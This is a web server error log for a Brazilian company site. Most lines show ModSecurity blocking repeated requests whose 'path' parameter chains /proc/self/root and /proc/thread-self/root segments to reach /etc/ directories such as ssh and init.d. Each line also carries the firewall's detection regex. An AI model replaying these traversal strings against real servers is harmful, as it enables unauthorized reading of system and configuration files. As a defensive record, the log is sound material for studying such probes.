[Wed Mar 18 11:14:14.214099 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:45300] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzNda6ubjKNq_cu4afjQAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:14:17.668572 2026] [:error] [pid 17653:tid 140411741927168] [client 74.7.243.128:45308] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzOcdf6f5d65gmYZTakAAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:14:19.544404 2026] [:error] [pid 29882:tid 140411658000128] [client 74.7.243.128:45316] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzOkzinOy1jxa1j4caowAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:14:24.491067 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.243.128:43078] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzQOyqAr6etmhZHNrF_gAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:14:25.893225 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.243.128:43082] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzQeyqAr6etmhZHNrF_wAAAFM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:14:53.195067 2026] [:error] [pid 11816:tid 140411632822016] [client 74.7.241.31:39676] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzXew_le52K8_3pV3lFQAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:15:01.413485 2026] [mime_magic:error] [pid 26799:tid 140411716749056] (70014)End of file found: [client 57.141.18.4:60322] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 11:15:28.911205 2026] [:error] [pid 29882:tid 140411574073088] [client 74.7.241.31:47158] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzgEzinOy1jxa1j4ca1AAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:15:31.505746 2026] [:error] [pid 29882:tid 140411649607424] [client 74.7.241.31:46336] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzg0zinOy1jxa1j4ca1gAAAQs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 11:16:19.871788 2026] [:error] [pid 19507:tid 140411607643904] [client 74.7.241.31:46346] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzs9Y0UrI5A3LftIyyvQAAAZA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 11:16:24.543047 2026] [:error] [pid 19507:tid 140411616036608] [client 74.7.243.128:43090] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzuNY0UrI5A3LftIyyxQAAAY8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:16:29.367498 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.243.128:60360] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzveoXxyEfFpUF8f9y4AAAAU4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:16:29.455155 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.241.31:43526] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzvdY0UrI5A3LftIyy1QAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:16:37.993930 2026] [mime_magic:error] [pid 15051:tid 140411683178240] (70014)End of file found: [client 57.141.18.26:35188] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 11:16:41.943779 2026] [:error] [pid 26799:tid 140411574073088] [client 74.7.243.128:41928] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzyda6ubjKNq_cu4agPwAAA1Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:16:44.395335 2026] [:error] [pid 29882:tid 140411565680384] [client 74.7.243.128:57770] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqzzEzinOy1jxa1j4ca7gAAARU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:16:51.814719 2026] [:error] [pid 11816:tid 140411599251200] [client 74.7.243.128:57778] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqz0-w_le52K8_3pV3lawAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:16:53.106025 2026] [:error] [pid 30077:tid 140411649607424] [client 74.7.243.128:39294] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqz1fu8EFLIOrSqIpsJSwAAAks"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:16:57.087043 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.243.128:39296] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqz2da6ubjKNq_cu4agVQAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:16:59.471053 2026] [:error] [pid 17887:tid 140411599251200] [client 74.7.243.128:39304] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqz2wkwaGbbGflqUZAVhwAAANE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:17:41.758699 2026] [:error] [pid 11816:tid 140411691570944] [client 74.7.241.31:39722] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq0Bew_le52K8_3pV3lrAAAAgY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:18:06.289894 2026] [mime_magic:error] [pid 19507:tid 140411607643904] (70014)End of file found: [client 74.7.241.31:51504] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/lib/systemd/user
[Wed Mar 18 11:18:23.635564 2026] [:error] [pid 11816:tid 140411548894976] [client 74.7.241.31:42640] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq0L-w_le52K8_3pV3lxAAAAhc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 11:18:34.280372 2026] [:error] [pid 30077:tid 140411641214720] [client 74.7.243.128:51778] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abq0Ovu8EFLIOrSqIpsJqgAAAkw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
